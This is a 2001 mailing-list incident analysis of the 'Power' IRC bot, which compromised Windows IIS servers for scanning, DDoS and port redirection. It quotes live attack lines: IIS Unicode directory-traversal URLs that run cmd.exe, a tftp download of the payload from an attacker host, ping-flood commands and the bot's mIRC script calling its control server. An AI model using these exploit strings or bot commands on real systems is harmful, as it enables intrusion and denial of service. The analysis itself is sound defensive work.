"Power" bot (was Re: NEW DEVELOPMENT -- Attempts at using CodeRed II systems to perform Denial of Service Attacks and Possible Attacking Tool)

From: Dave Dittrich (dittrich@cac.washington.edu)
Date: 08/08/01

Date: Wed, 8 Aug 2001 12:41:55 -0700 (PDT)
From: Dave Dittrich <dittrich@cac.washington.edu>
To: Ryan Russell <ryan@securityfocus.com>
Subject: "Power" bot (was Re: NEW DEVELOPMENT -- Attempts at using CodeRed II systems to perform  Denial of Service Attacks and Possible Attacking Tool)
Message-ID: <Pine.LNX.4.33.0108081141550.8353-100000@shiva0.cac.washington.edu>


> On Tue, 7 Aug 2001, Eyes to the Skies. wrote:
> > This looks like an attempt to use a CodeRed II infected system to
> > perform a denial of service attack. I don't think I need to stress the
> > severity of this.
> >
> > ==> /var/log/apache/access_log <==
> > [deleted host] - - [07/Aug/2001:17:19:35 -0400] "GET
> > /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+ping.exe+"-v"+igmp+"-t"+"-l"+65000+[deleted
> > target ip]+"-n"+7000+"-w"+0" 404 -
> Nothing to do with code red, or it would be root.exe, or
> /c/winnt/system32/cmd.exe.

I believe Ryan is correct that this is not CodeRed (or CodeRed II,
or Son-of-teenage-mutant-ninja-Red...) Rather, it looks to me
like this is the "Power" bot (CERT Advisory 2001-20 called it a worm,
though I don't believe it shows worm properties, when actually it just
combines distributed DoS, scanning, and port redirection in a single
tool that uses IRC for its control channel.) The CERT Advisory from
July 20 can be found at:


Below is an edited version of an analysis of "Power" bot. Best
(although hasty) efforts were made to sanitize it.

Reports of UDP "probes" from suspected CodeRed infected machines
may also be Power, but mis-categorized due to insufficient data.
Compare running processes and files on the system with information
in this report.

If you see evidence of this on your systems or networks, report this
to CERT and NIPC. (Please note differences in MD5 hashes of files
when reporting to help CERT/NIPC/whoever track variants and/or confirm
what is actually on the system. Seems like there are four or five
different malware programs floating around Windows NT/2000/IIS
systems, and more confusion than necessary about what is what. Details
*do* matter.)


[Note that output of the "ngrep" program is showing "2001/06/XX"
instead of "2001/07/XX", e.g.:

T 2001/06/03 18:07:28.124220 -> [AP]
  :XXXX!~XXXX@ PRIVMSG #XXXX :PASS: Password accepted;
   you are now registered with this service..

This may be a bug. No time has been spent trying to fix it, but
conversion of time stamps shown by "tcpdump" shows the log files have
the correct times.]

 Executive summary

The following is a report of distributed scanning, distributed denial
of service (DDoS), and distributed IRC port redirection, surrounding a
custom script add-on to the mirc32.exe client for Windows. This activity
is associated with Windows 2000 and Windows NT systems, and is
currently relying on the Unicode vulnerability in Microsoft's IIS
server on these platforms.

Over 40 systems at one site were affected, and several were used
concurrently for denial of service attacks and distributed scanning
from July 2 through July 9. This site has received over 100 reports
during this period.

The distributed scanning is known to have attempted the IIS/Unicode
exploit in excess of 300,000 systems, and netted close to 10,000
vulnerable systems between July 6 and July 8, 2001. The attackers are
actively using this network for IRC "war" activity.

At this time, there is no known motive for more widespread attacks,
but the intruders are actively upgrading the software package in an
attempt to automate the addition of compromised hosts to the DDoS
network, which would result in a fully integrated scan/exploit/attack
network. (Limits in the ability to use IRC as a means of command and
control may limit the potential size of this network, but even with
the hosts they now control they are causing a significant amount of
network disruption and hundreds of abuse reports to those sites whose
systems are being used for scanning.)

 Time line and details

On July 1, 2001, XXXX reported detection of an attempted probe of his
web server:

[07/01/2001 00:04:43.602 GMT-0700] Connection:
[07/01/2001 00:04:43.922 GMT-0700] GET

This shows an attempted exploit of the Windows IIS Unicode vulnerability,
most recently made famous on May 8, 2001, in CERT Advisory 2001-11 as
a feature of the Linux sadmind-IIS worm:


At 15:05 on July 3, XXXXXX noticed abnormally high traffic rates on
the XXXXXXXXXXX/24 subnet:

Shortly after this, XXXXX analyzed the router's flow cache and noted
the following flows to/from the host XXXXXXXXXXXX (protocol 1 is

SrcIPaddress DstIPaddress Pr SrcP DstP Pkts B/Pk
XXXXXXXXXXXX 01 0000 0000 5496 1500
XXXXXXXXXXXX 01 0000 0800 561 1500
XXXXXXXXXXXX 01 0000 0800 66 1500
XXXXXXXXXXXX 01 0000 0B01 33 56
XXXXXXXXXXXX 01 0000 0B01 2 56
XXXXXXXXXXXX 01 0000 0000 7245 1475
XXXXXXXXXXXX 01 0000 0000 39K 1475 530.4
XXXXXXXXXXXX 01 0000 0800 893 1500
XXXXXXXXXXXX 01 0000 0000 30K 1498 1323.3

XXXX noted that, as XXXXXX had observed, the attack appeared to have

XXXXX initiated network traffic monitoring to/from this system and noted
the following (output of "ngrep" program shown here):

  :blyeuhisdalg!~yxccqtdbciwy@XXXXXXXXX.213 JOIN :#XXXX..:tsorbmpybher!~
  voqteovzeijy@XXXXXXXXXXXXX JOIN :#XXXX..:ifwufklkxvrn!~tyyaxtpiybwh@XX
  XXXXXXXXXXX JOIN :#XXXX..:xcvzlgiwcyqw!~yjcefcwnoler@XXXXXXXXXXXX JOIN
   :#XXXX..:cehhaftlgppn!~skfutrulflcp@XXXXXXXXXXXXX JOIN :#XXXX..:stfet
  nzamgbm!~accjbzpgfcww@XXXXXXXXXXXX JOIN :#XXXX..:gwypgjbdbely!~actybok
  ttocq@XXXXXXXXXXXX JOIN :#XXXX..:zijlrondxqhb!~eoeelcwewsbs@XXXXXXXXXX
  XXX JOIN :#XXXX..:dyyyrpyannjh!~foyazmdppwyx@XXXXXXXXXXXXX JOIN :#XXXX
  ..:wmvcxcwsgypu!~fhkgogxuwcwa@XXXXXXXXXXXXXX JOIN :#XXXX..:rewgeayxjyv
  e!~wmqrpzihhrpp@XXXXXXXXXXXXXX JOIN :#XXXX..:kfukbsyoxacl!~qkpttdwhhba
  d@XXXXXXXXXXXXX JOIN :#XXXX..:jgmkjdbvlrpy!~sprbfnzguzwc@XXXXXXXXXXXXX
   JOIN :#XXXX..:swbbqdjyviql!~imufldgcgcbt@XXXXXXXXXXXX JOIN :#XXXX..

He followed this IRC traffic to other hosts and observed the

T 2001/06/03 18:07:28.124220 -> XXXXXXXXXXXXX:2334 [AP]
   you are now registered with this service..

T 2001/06/03 18:07:28.625205 -> XXXXXXXXXXXXX:2334 [AP]
  n port 111 [ /server XX.XXX.XXX.XX 111 ]..

Based on investigation, XXXXX was able to identify 9 hosts that
were likely compromised.

XXXXX had observed IRC traffic associated with these hosts. XXXXX
reported that the only IRC nick observed using XXXXXXXXXXXXXXXX
systems that isn't a random string of characters is "XXXXXXXXXXXXX",
and it looks like she and her bots hang out in the channel #XXXXX:


(enter all of his bots into #XXXX)

XXXXX observed the nick "XXXXXX" immediately grant operator privileges
to all of the bots, so it is assumed this is either also a bot, or
he/she is probably involved as well.

XXXXX made an nmap scan of the above listed suspect systems.
Common to many was a profile like the following, which shows Windows
2000 as the operating system, and at least two unusual listening

Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/)
Interesting ports on XXXXXXXXXXXX (
(The 65522 ports scanned but not shown below are in state: closed)
Port State Service
21/tcp open ftp
23/tcp open telnet
25/tcp open smtp
80/tcp open http
100/tcp open newacct
135/tcp open loc-srv
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
1025/tcp open listen
1026/tcp open nterm
4836/tcp open unknown
12624/tcp open unknown

TCP Sequence Prediction: Class=random positive increments
                         Difficulty=17052 (Worthy challenge)
Remote operating system guess: Windows 2000 RC1 through final release

A connection to the 12624/tcp port elicits a "Password:" prompt.

(A capture of all network to/from several hosts was initiated on
July 3.)

On July 3, notice was sent to all the registered subnet contacts for
the known hosts, noting the suspected intrusions and the known
ports 100/tcp and 12624/tcp.

One administrator who received this message reported that he had
analyzed his system (a Win2k/IIS test system) using Foundstone's
"fport" program, found on this page:


It showed the following:

FPort v1.33 - TCP/IP Process to Port Mapper
Copyright 2000 by Foundstone, Inc.

Pid Process Port Proto Path
884 inetinfo -> 21 TCP C:\WINNT\System32\inetsrv\inetinfo.exe
884 inetinfo -> 25 TCP C:\WINNT\System32\inetsrv\inetinfo.exe
884 inetinfo -> 80 TCP C:\WINNT\System32\inetsrv\inetinfo.exe
1400 winnt -> 100 TCP C:\winnt.exe
444 svchost -> 135 TCP C:\WINNT\system32\svchost.exe
884 inetinfo -> 443 TCP C:\WINNT\System32\inetsrv\inetinfo.exe
8 System -> 445 TCP
736 MSTask -> 1044 TCP C:\WINNT\system32\MSTask.exe
884 inetinfo -> 1052 TCP C:\WINNT\System32\inetsrv\inetinfo.exe
660 sqlservr -> 1056 TCP C:\MSSQL7\binn\sqlservr.exe
8 System -> 1067 TCP
660 sqlservr -> 1433 TCP C:\MSSQL7\binn\sqlservr.exe
1400 winnt -> 2350 TCP C:\winnt.exe
1400 winnt -> 2351 TCP C:\winnt.exe
1400 winnt -> 2352 TCP C:\winnt.exe
1400 winnt -> 2353 TCP C:\winnt.exe
 [hundreds of lines removed . . .]
1400 winnt -> 2646 TCP C:\winnt.exe
1400 winnt -> 2647 TCP C:\winnt.exe
1400 winnt -> 2648 TCP C:\winnt.exe
772 termsrv -> 3389 TCP C:\WINNT\System32\termsrv.exe
884 inetinfo -> 4700 TCP C:\WINNT\System32\inetsrv\inetinfo.exe
1152 nt -> 4836 TCP c:\inetpub\scripts\nt.exe
1152 nt -> 12624 TCP c:\inetpub\scripts\nt.exe
444 svchost -> 135 UDP C:\WINNT\system32\svchost.exe
8 System -> 445 UDP
260 lsass -> 1027 UDP C:\WINNT\system32\lsass.exe
220 winlogon -> 1046 UDP \??\C:\WINNT\system32\winlogon.exe
248 services -> 1051 UDP C:\WINNT\system32\services.exe
884 inetinfo -> 1064 UDP C:\WINNT\System32\inetsrv\inetinfo.exe
564 llssrv -> 1087 UDP C:\WINNT\System32\llssrv.exe
464 spoolsv -> 1217 UDP C:\WINNT\system32\spoolsv.exe
884 inetinfo -> 3456 UDP C:\WINNT\System32\inetsrv\inetinfo.exe
1152 nt -> 12623 UDP c:\inetpub\scripts\nt.exe

Listening on 100/tcp and 12624/tcp is the same program,
"c:\inetpub\scripts\nt.exe". (It is unclear what the 300 ports listed
for "C:\winnt.exe" are all about.)

On July 5, XXXX notes more IRC traffic that has been logged, showing
the network for bots being used to initiate DDoS attacks:

T 2001/06/05 09:46:03.354884 -> [AP]

T 2001/06/05 09:56:40.777333 -> [AP]

T 2001/06/05 10:26:32.567410 -> [AP]
  :XXXX!~XXXXXX@ QUIT :upset/depressed/pissed off/hu

T 2001/06/05 10:26:32.561551 -> [AP]
  :XXXX!~XXXXXX@ QUIT :upset/depressed/pissed off/hu

T 2001/06/05 10:40:45.555193 -> [AP]

T 2001/06/05 09:19:36.061139 -> [AP]

T 2001/06/05 09:29:30.138876 -> [AP]

The victim of this attack is:

    Internet address =

SplitRock Services, Inc (NETBLK-SPLITROCK98)
   8665 New Trails Drive
   The Woodlands, TX 77381

   Netname: SPLITROCK98
   Netblock: -
   Maintainer: SPLT

      Splitrock Services, Inc (IS1-ARIN) netadmin@SPLITROCK.NET

(See also files "remote.ini" and "mirc.ini")

On July 6, two incident handlers examined a suspect Windows 2000 system.

Using Foundstone's "afind" and "fport" forensic tools for Windows
it was confirmed that "nt.exe" was installed on this system
July 1 19:39 PDT. (It was found that C:\winnt.exe could not be zipped
directly, but could be copied to D:\ where it was then possible to zip
it into an archive.)

The following files were found and retrieved for analysis and reverse
engineering (MD5 hashes shown for comparison):

00b41a87e536de8908af134692ceadf6 hexplore.exe
00f8ba83759e9257603d4203b0561715 mirc.ini
87f4355b0a59a7e87250ff4925dc75b8 nt.exe
6d3ee930a216483ea2dd5860ea7d44f0 nt.INI
748cbd596f1956858f27f88731000644 remote.ini
7644ae3bcadae89e7160e3aff2e7d2bc root.exe
5cbbd44be7359be787765abf7c90644b winnt.exe
0a1295be3a0fb615e7dfb88b9a3abb20 win98.ava
dc5a3f43491d8309f1742acec7668698 wins.ava

These files were located in the C:\Inetpub\scripts, C:\, and C:\i386
directories. (The same system showed an earlier exploitation by the
sadmind-IIS worm, which left the files default.asp, default.htm,
index.asp, and index.htm. Also found was root.exe, which may have
been from yet another prior compromise.)

 Volume in drive C has no label.
  Volume Serial Number is 401B-321D

   Directory of c:\Inetpub\scripts

   07/01/01 19:31 <DIR> .
   07/01/01 19:31 <DIR> ..
   06/13/01 09:19 289 default.asp
   06/13/01 09:19 289 default.htm
   06/13/01 09:19 289 index.asp
   06/13/01 09:19 289 index.htm
   07/01/01 19:30 161,280 nt.exe
   07/01/01 19:31 23 nt.INI
   11/18/99 12:04 208,144 root.exe
                  9 File(s) 370,603 bytes
                                               37,631,488 bytes free

It is not clear what role the nt.INI file plays, but the contents are
shown here (two versions from two different sources are shown):

% xxd nt.INI
0000000: bdb0 a8b3 baad 0d0a cfdc c0d2 decb cb0d ................
0000010: 0a0d 0a0d 0a0d 0a .......

% xxd ../nt.INI
0000000: bdb0 a8b3 baad 0d0a dad1 cbd6 decb 0d0a ................
0000010: 0d0a 0d0a 0d0a ......

The program appears to work in this way:

  1). The attacker exploits the Unicode vulnerability in Microsoft IIS
       to run a command. This command uses the trivial file transfer
       protocol to upload a file from the attacking host:

2001-07-02 21:39:14 - 80 GET
/scripts/..\../winnt/system32/cmd.exe /c+tftp.exe+"-i"+ 502 -

       (It is assumed the same method is used to then run the program,
       although this has not been confirmed from system logs. The
       above is all that was provided.)

  2). The "nt.exe" program appears to be compressed. When run, it is
      assumed it uncompresses itself, creates(?) a file nt.INI (role
      not determined yet) and configures the system to restart
      itself at each reboot. It listens on port 12624 for commands
      to upload files. (It is not yet clear precisely how this upload
      protocol works, but it has been observed to upload files on
      port 4836/tcp as shown below.)

  3). After nt.exe is set up, a series of programs are loaded,

        winnt.exe     Renamed(?) mirc32.exe binary
        mirc.ini      mirc32 config file
        hexplore.exe  Rootkit style process hider?
        remote.ini    Configuration file for bot
        wins.ava      Code for BNC/Scan/DDoS program
        win98.ava     Code for BNC/Scan/DDoS program

      These files have been found in C:\Inetpub\scripts, C:\, and/or

   4). Periodically, new updates of the program are uploaded from
       other sites. (This program appears to be in active
       development by XXXXX and XXXXXXX.)

The following is the (edited) contents of "remote.ini", a list of
variables for the bot, which shows these nicks and other specifics of
the bot:

n1=%scan.ip 24.189.31.*
n2=%scan.port 27374
n3=%scan.inc 191
n4=%r 858921703669
n6=%auto #XXXX
n7=%masterpass 12345
n8=%key password
n9=%pass power
n10=%mass.server dysfunction-1.mine.nu
n11=%mass.port 6667
n12=%mass.bots 5
n13=%mass.inc 5
n14=%user qmlhzqztcjqh
n16=%split.port 6667
n17=%split.chans #XXXX,#XXXXXX,#XXXX
n18=%bnc power
n19=%udp.times 99999
n20=%udp.chan #XXXX
n22=%dos.times 50
n23=%bup 15
n24=%bnc.port 100
n25=%bnc.status On
n26=%scan.p 27374
n27=%sscan On
n28=%scan.info SubSeven Protection: http://come.to/sub7-protection/
n29=%found.upload server removed. closing...
n30=%progress 8
n31=%uploading found
n32=%localfile c:\windows\winserver.exe
n33=%remotefile c:\windows\winserver.exe
n34=%upload.tot 382371
n35=%channel #XXXX
n36=%prefix 24

Commands supported by the server version analyzed on July 7, 2001.
Command options are shown in lower case, with user specific variable
arguments shown in ALL CAPS (see "wins.ava" for source to these

                Show info about system running bot, for example:

PRIVMSG #XXXX :[Windows 2000][1wk 3days 6hrs 25mins 12secs][][Powe
:Power[9738712607]!~Power@ PRIVMSG #XXXX :[Windows NT][2wks 6days
22hrs 6mins 3secs][][Power1.0]
:Power[2558484581]!~Power@ PRIVMSG #XXXX :[Windows 2000][2wks 1day
15hrs 52mins 4secs][][Power1.0]
:Power[6813557052]!~Power@ PRIVMSG #XXXX :[Windows 2000][1wk 2days
 8hrs 44mins 53secs][][Power1.0]
:Power[2916020276]!~Power@ PRIVMSG #XXXX :[Windows NT][1wk 6days 1
5hrs 27mins 33secs][][Power1.0]
:Power[4053275324]!~Power@ PRIVMSG #XXXX :[Windows 2000][1wk 2days
 8hrs 44mins 1sec][][Power1.0]
:Power[4205594385]!~Power@ PRIVMSG #XXXX :[Windows 2000][2wks 6day
s 2hrs 15mins 51secs][][Power1.0]
 . . .

        !add NICK
                Allows access to specified nick

        !remove NICK
                Removes access to specified nick


        !pass PASSWORD
                Sets new password

        !login PASSWORD
                Logs user in, if the password is correct (this password
                is in clear text.)

        !massbots SERVER PORT BOTS
                (Not sure how this works, but probably tells bots which
                IRC server to use; not sure what the # at end is for yet.)

        !rbots #CHAN
                Register(?) bots in channel "#CHAN".

                Closes socket for "*Power*" (kills bots?)

        !udp IP TIMES
                Floods victim ip address "IP" with large UDP packets

        !hudp IP
        !hudp all
                Halt UDP flood on specific IP, or all hosts being flooded

                Prints list of ips being flooded.

        !dos IP TIMES
                This command exploits a feature of Microsoft
                Windows 2000 ping.exe, which allows one to set the
                protocol type to IGMP or IGRP for packets sent, using
                the following flags:

              ping -v igrp -t -l 5000 %dos.ip -n %dos.times -w 0
              ping -v igmp -t -l 5000 %dos.ip -n %dos.times -w 0

        !bnc on
                Enable BNC port redirection on preset port (100 is being
                used currently on those bots observed.)

        !bnc off
                Disable BNC port redirection.

        !bnc port PORT
                Set port for BNC to listen on to "PORT".

        !bnc pass BNC

        !bnc reset
                Closes and reopens socket.

        !bnc status
                Report status of BNC and explain how to connect to it.

        !scan status
                Report status of scanning (IP and port.)

        !scan off
                Stop scanning.

        !scan prefix PREFIX
                Start scanning IP netblock with prefix PREFIX on predefined

        !scan on
                Start scanning on IP netblock defined by the first octet
                the predefined prefix, the second octet randomized from
                0..220, the third octet randomized from 0..255,
                and the fourth octet being anything. The port to be scanned
                is assumed to have been set earlier. Lastly, it reports
                scanning status.

        !scan port PORT
                Sets the port to be scanned and reports status.

        !raw command [args...]
                (Not quite sure how this works.)

                (Unknown how this works)

        !host list
                If user's nick is in a special access list, list the number
                of lines in the file "webservers.txt" (must be a list
                of bots).

        !host send
                Sends a copy of "webservers.txt" via DCC.

        !packet IP PACKETS
                Flood address IP with PACKETS packets from each of a
                set of web servers listed in a file "webservers.txt".
                These are Windows IIS servers with the Unicode
                vulnerability. It sends each one a web request:

        GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c ping.exe -v igmp
        -t -l 30000 IP -n PACKETS -w 10

                Reports "Packeting IP with # Packets and N hosts" (where
                "N" is the number of lines in "webservers.txt")

                Reports "Sockets Opened During Last Packet: N" where
                N is a variable %sockets.

        !rbots COMMAND
                Not sure what this is, but here it is in use:

T 2001/06/06 02:37:25.209849 -> [AP]
  :XXXXXXX!~XXXXXX@ PRIVMSG #XXXX :!rbots privmsg
    dos[12] :this annoying!..
    . . .
T 2001/06/06 02:38:02.828723 -> [AP]
  :XXXXXXX!~XXXXXX@ PRIVMSG #XXXX :!rbots notice
  dos[12] :this annoying!..

Examples of commands:

T 2001/06/06 00:38:22.697747 -> [AP]

T 2001/06/06 00:38:23.106934 -> [AP]
  :Power[2558484581]!~Power@ PRIVMSG #XXXX :[UDP][IP: 216.1
  98.75.194][Times: 99999][Halt: !hudp]..:Power[973871260
  7]!~Power@ PRIVMSG #XXXX :[UDP][IP:][Time
  s: 99999][Halt: !hudp]..:Power[8935450546]!~Power@217.3
  4.104.98 PRIVMSG #XXXX :[UDP][IP:][Times: 99999][Halt:
   !hudp]..:Power[9201287277]!~Power@ PRIVMS
  G #XXXX :[UDP][IP:][Times: 99999][Halt: !hudp 216.198.
  75.194]..:Power[8536771384]!~Power@ PRIVMSG #XXXX :[UDP]
  [IP:][Times: 99999][Halt: !hudp]..:Power
  [6035234664]!~Power@ PRIVMSG #XXXX :[UDP][IP: 216.198.75
  .194][Times: 99999][Halt: !hudp]..:Power[2916020276]!~P
  ower@ PRIVMSG #XXXX :[UDP][IP:][Times: 99
  999][Halt: !hudp]..:Power[2905936848]!~Power@192.168.14
  .12 PRIVMSG #XXXX :[UDP][IP:][Times: 99999][Halt: !hud
  999][Halt: !hudp]..:Power[2905936848]!~Power@192.168.14
  .12 PRIVMSG #XXXX :[UDP][IP:][Times: 99999][Halt: !hud
  p]..:Power[5499856258]!~Power@ PRIVMSG #po
  wer :[UDP][IP:][Times: 99999][Halt: !hudp
  4]..:Power[4053275324]!~Power@ PRIVMSG #XXXX :[UDP][IP:][Times: 99999][Halt: !hudp]..:Power[6731
  664986]!~Power@ PRIVMSG #XXXX :[UDP][IP:]
  [Times: 99999][Halt: !hudp]..:Power[3834129955]!~Power@ PRIVMSG #XXXX :[UDP][IP: 216.19..............

T 2001/06/06 00:38:23.106934 -> [AP]
  s: 99999][Halt: !hudp]..

T 2001/06/06 00:38:23.490730 -> [AP]
  :Power[2236262189]!~Power@ PRIVMSG #XXXX :[UDP][IP: 216.
  198.75.194][Times: 99999][Halt: !hudp]..:Power[87055102
  95]!~Power@ PRIVMSG #XXXX :[UDP][IP:][Tim
  es: 99999][Halt: !hudp]..:Power[6941998911]!~Power@217.
  34.194.193 PRIVMSG #XXXX :[UDP][IP:][Times: 99999][Hal
  es: 99999][Halt: !hudp]..:Power[6941998911]!~Power@217.
  34.194.193 PRIVMSG #XXXX :[UDP][IP:][Times: 99999][Hal
  t: !hudp]..:Power[9080084936]!~Power@ PRIV
  MSG #XXXX :[UDP][IP:][Times: 99999][Halt: !hudp 216.19

T 2001/06/06 00:38:29.706665 -> [AP]
  :Power[3408730344]!~Power@ PRIVMSG #XXXX :All UDP Halted.

T 2001/06/06 00:38:30.278941 -> [AP]
  :Power[3408730344]!~Power@ PRIVMSG #XXXX :[UDP][IP: 216.1
  98.75.194][Times: 99999][Halt: !hudp]..

T 2001/06/06 00:38:19.943790 -> [AP]

T 2001/06/06 00:38:20.328563 -> [AP]
  :Power[9738712607]!~Power@ PRIVMSG #XXXX :All UDP Halted
  ..:Power[2558484581]!~Power@ PRIVMSG #XXXX :All UDP Halte
  d..:Power[8935450546]!~Power@ PRIVMSG #XXXX :All UDP Hal
  ted..:Power[2916020276]!~Power@ PRIVMSG #XXXX :All UDP H

T 2001/06/06 00:38:20.869588 -> [AP]
  :Power[3834129955]!~Power@ PRIVMSG #XXXX :All UDP Halted
  ..:Power[6035234664]!~Power@ PRIVMSG #XXXX :All UDP Halt
  ed..:Power[2905936848]!~Power@ PRIVMSG #XXXX :All UDP Ha
  lted..:Power[5499856258]!~Power@ PRIVMSG #XXXX :All UDP
  Halted..:Power[6731664986]!~Power@ PRIVMSG #XXXX :All UD
  P Halted..:Power[4053275324]!~Power@ PRIVMSG #XXXX :All
  UDP Halted..:Power[9201287277]!~Power@ PRIVMSG #XXXX :Al
  l UDP Halted..:Power[8536771384]!~Power@ PRIVMSG #XXXX :
  UDP Halted..:Power[9201287277]!~Power@ PRIVMSG #XXXX :Al
  l UDP Halted..:Power[8536771384]!~Power@ PRIVMSG #XXXX :
  All UDP Halted..:Power[8705510295]!~Power@ PRIVMSG #XXXX
   :All UDP Halted..:Power[9080084936]!~Power@ PRIVMSG #pow
  er :All UDP Halted..:Power[6941998911]!~Power@ PRIVMSG #
  power :All UDP Halted..

T 2001/06/06 00:38:21.840309 -> [AP]
  :Power[2236262189]!~Power@ PRIVMSG #XXXX :All UDP Halted

T 2001/06/06 00:58:49.455709 -> [AP]

T 2001/06/06 00:58:49.660791 -> [AP]
  :Scanner[208]!~Power@ PRIVMSG #XXXXXX :[Windows 2000][1wk 3d
  ays 7hrs 7mins 12secs][][Power1.0]..

T 2001/06/06 00:58:49.944976 -> [AP]
  :Scanner[24]!~Power@ PRIVMSG #XXXXXX :[Windows 2000][2wks 6d
  ays 2hrs 57mins 52secs][][Power1.0]..

Request for webservers.txt (list of vulnerable IIS servers)

T 2001/06/06 05:09:13.401016 -> [AP]
  :XXXXXXX!~XXXXXX@ PRIVMSG Scanner[65] :!raw dcc s
  end XXXXXXX webservers.txt..

T 2001/06/06 05:09:13.533831 -> [AP]
  NOTICE XXXXXXX :DCC Send webservers.txt (

T 2001/06/06 05:09:14.051419 -> [AP]
  NOTICE XXXXXXX :DCC Send webservers.txt (

T 2001/06/06 05:09:14.141264 -> [AP]
  PRIVMSG XXXXXXX :.DCC SEND webservers.txt 2153728921 4989 28971..

T 2001/06/06 05:09:14.562170 -> [AP]
  PRIVMSG XXXXXXX :.DCC SEND webservers.txt 2153728981 3843 32793..

T 2001/06/06 05:09:18.843498 -> [AP]
  ME file.ext 4989 2130...

T 2001/06/06 05:09:18.844475 -> [AP]
  PRIVMSG XXXXXXX :.DCC ACCEPT file.ext 4989 2130..

T 2001/06/06 05:09:24.155118 -> [AP]
  :XXXXXXX!~XXXXXX@ PRIVMSG Scanner[65] :!raw dcc s
  end XXXXXXX webservers.txt..

T 2001/06/06 05:09:24.155118 -> [AP]
  :XXXXXXX!~XXXXXX@ PRIVMSG Scanner[208] :!raw dcc
  send XXXXXXX webservers.txt..

T 2001/06/06 05:09:24.170743 -> [AP]
  NOTICE XXXXXXX :DCC Send webservers.txt (

T 2001/06/06 05:09:24.251799 -> [AP]
  NOTICE XXXXXXX :DCC Send webservers.txt (

T 2001/06/06 05:09:24.730324 -> [AP]
  PRIVMSG XXXXXXX :.DCC SEND webservers.txt 2153728921 3407 29000..

T 2001/06/06 05:09:24.839701 -> [AP]
  PRIVMSG XXXXXXX :.DCC SEND webservers.txt 2153728981 2523 32793..


> - - [06/Jul/2001:06:44:08 -0500] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir" 404 - "-" "-"

> > Jul-06 05:30:26
> > GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir

[Fri Jul 6 03:08:15 2001] [error] [client] File does not exist:
/usr/sites/ben/htdocs/default/scripts/..^../winnt/system32/cmd.exe - - [06/Jul/2001:03:08:15 -0600] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir" 404 - "-" "-"
[Fri Jul 6 03:08:15 2001] [error] [client] File does not exist:

Hosts reported scanning off site:

On July 7, the following report was received:

    Date: Sat, 07 Jul 2001 18:29:45 -0400
    Subject: Re: [1775] Re: hack attempt from
    From: XXXXXX
    To: abuse@site

    Thank you for the prompt follow-up to my message. In response to the
    additional information you requested, the clock on my server is set to
    the eastern daylight time, and is calibrated with Apple's time server.
    This means the attack occurred at 3.45 am your time, on July 6th.

    Here is the web log excerpt once again (same as in the first message): - - [06/JUL/2001:06:45:33 -0400] "GET
    /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir" 404 186

The bot on this system has been actively scanning for quite some time, and
this status message occurs prior to the report by XXXXXX.

T 2001/06/06 03:44:18.685984 -> [AP]

T 2001/06/06 03:44:19.273885 -> [AP]
  :Scanner[208]!~Power@ PRIVMSG #XXXXXX :[SCAN][Status: ][IP:][Port: 80][Found: 1279]..:Scanner[24]!~Power@
  0 PRIVMSG #XXXXXX :[SCAN][Status: ][IP:][Port: 80][Found: 16

At this point, it is up to 2934 vulnerable systems.

At 00:15:31 on July 6, someone on the host uploads a set
of new programs to the host

T 2001/06/06 00:38:34.043659 -> [AP]

T 2001/06/06 00:38:35.567124 -> [AP]

T 2001/06/06 00:38:38.827927 -> [AP]

T 2001/06/06 00:38:48.360328 -> [AP]

T 2001/06/06 00:38:48.538066 -> [A]
  alias connect { .server dysfunction-1.mine.nu 6667 }..on 1:start:{..
  run hexplore.exe /hide mIRC*..writeini c:\winnt\win.ini windows run $m
  ircexe...timerwriteini 0 30 writeini c:\winnt\win.ini windows run $mir
  cexe.. nick Scanner[208].. .server dysfunction-1.mine.nu 6667.. .ti
  merconnect 0 30 connect..write -c webservers.txt..if (%scanning != don
  e) { .http | halt }..}..on 1:connect:{.. timerconnect off..
    join #XXXXXX %key..}..on 1:disconnect:{.. server dysfunction-1.mine.nu
   6667.. .timerconnect 0 30 connect..}..on 1:t
. . .

This shows the uploading of files found on other systems, in this case
"wins.ava". The word "password" is also seen as the key value in the
"remote.ini" file shown earlier. The file upload protocol thus uses
12684/tcp to initiate the transfer, followed by the file contents
being sent on 4836/tcp.

Around midnight on the morning of July 6, XXXXX is talking with
XXXXXXX about their scanning efforts. XXXXX makes an estimate of how
long the scanning will take:

T 2001/06/06 00:13:41.244701 -> [AP]
  :XXXXX!~XXXXXX@ PRIVMSG #XXXX :and it will take them
  24 hours to scan the whole ip range..

A few minutes later, XXXXX checks the status and sees they have
detected "almost 1000" vulnerable Windows IIS servers.

T 2001/06/06 00:58:54.622797 -> [AP]
  :XXXXX!~XXXXXX@ PRIVMSG #XXXXXX :!scan status..

T 2001/06/06 00:58:54.821043 -> [AP]
  :Scanner[24]!~Power@ PRIVMSG #XXXXXX :[SCAN][Status: ][IP: 2][Port: 80][Found: 319]..

T 2001/06/06 00:58:55.156010 -> [AP]
  :Scanner[208]!~Power@ PRIVMSG #XXXXXX :[SCAN][Status: ][IP:][Port: 80][Found: 320]..

T 2001/06/06 00:59:03.677652 -> [AP]
  :XXXXX!~XXXXXX@ PRIVMSG #XXXXXX :almost 1000..

T 2001/06/06 00:59:09.126971 -> [AP]
  :XXXXX!~XXXXXX@ PRIVMSG #XXXXXX :and we aren't even close.

T 2001/06/06 00:59:15.598770 -> [AP]
  :XXXXX!~XXXXXX@ PRIVMSG #XXXXXX :we are gonna own more tha
  n we though..

T 2001/06/06 00:59:19.374231 -> [AP]
  :XXXXX!~XXXXXX@ PRIVMSG #XXXXXX :i bet 100thousand..

T 2001/06/06 01:00:21.989645 -> [AP]
  :XXXXX!~XXXXXX@ PRIVMSG #XXXXXX :!scan status..

T 2001/06/06 01:00:22.580477 -> [AP]
  :Scanner[208]!~Power@ PRIVMSG #XXXXXX :[SCAN][Status: ][IP:][Port: 80][Found: 323]..:Scanner[24]!~Power@ P
  RIVMSG #XXXXXX :[SCAN][Status: ][IP:][Port: 80][Found: 336].

Four hours later he checks again and the number is now over 5000...

T 2001/06/06 05:53:48.655820 -> [AP]
  :Scanner[24]!~Power@ PRIVMSG #XXXXXX :[SCAN][Status: ][IP: 2][Port: 80][Found: 2794]..:Scanner[208]!~Power@
